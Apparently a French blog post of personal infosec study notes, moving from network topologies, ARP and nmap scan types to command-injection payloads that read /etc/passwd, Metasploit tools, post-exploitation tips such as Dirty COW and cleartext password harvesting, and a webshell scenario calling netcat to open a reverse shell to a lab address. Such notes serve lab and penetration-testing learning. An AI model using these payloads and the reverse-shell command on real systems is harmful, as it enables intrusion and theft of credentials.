Infosec

 


Topologies Réseau

  • Topologie en étoile périphériques en étoile derriere un équipement réseau (switch)
    • la plus répandue



  • bus topologie
  • anneau


Equipements

  • relie des réseaux
  • switchs relie des équipements dans un segment de réseau




Les Protocoles

ARP

Lien adresse MAC / IP

  • arp request
  • arp reply

DHCP


NMAP

NMAP D'abord trouver les cibles qui sont online. Inutile de tenter de scanner des cibles offline : perte de temps, bruit sur le réseau..



Différents types de scan sont possilbes

* tcp connect
* syn
* udp
* null fin xmas
* icmp (plus précis en root)


NFS

* nfs-common


Command injection

Liste de commandes utiles lors d'une injection avec $(cmd)

whoami
id
ifconfig /ip addr
uname -a
ps -ef
env
  • $(cat /etc/os-release) : version os
echo $(awk -F: '$3 >= 1000 {print $1}' /etc/passwd)

$(echo $(awk -F: '$3 >= 1000 ' /etc/passwd))

getent passwd username



msfvenom

msfconsole

multi/handler

meterpreter

webshell

Apres un shell ou RCE

comme c instable on cherche à avoir un ssh

/home/user/.ssh

 Dirty C0w or a writeable /etc/shadow or /etc/passwd would quickly give you SSH access to the machine,

sur du win password filezilla ou vnc en clair ou md5

ajouter son user dans un groupe admin



Scénario

j'upload un webshell
je lance un listener sur ma machine
je l'appelle et je lance netcat
un 10.10.13.15/uploads/rev.php?cmd=nc 10.10.42.118 4444 -e /bin/bash

YES !










Commentaires

Posts les plus consultés de ce blog

infosec - exploit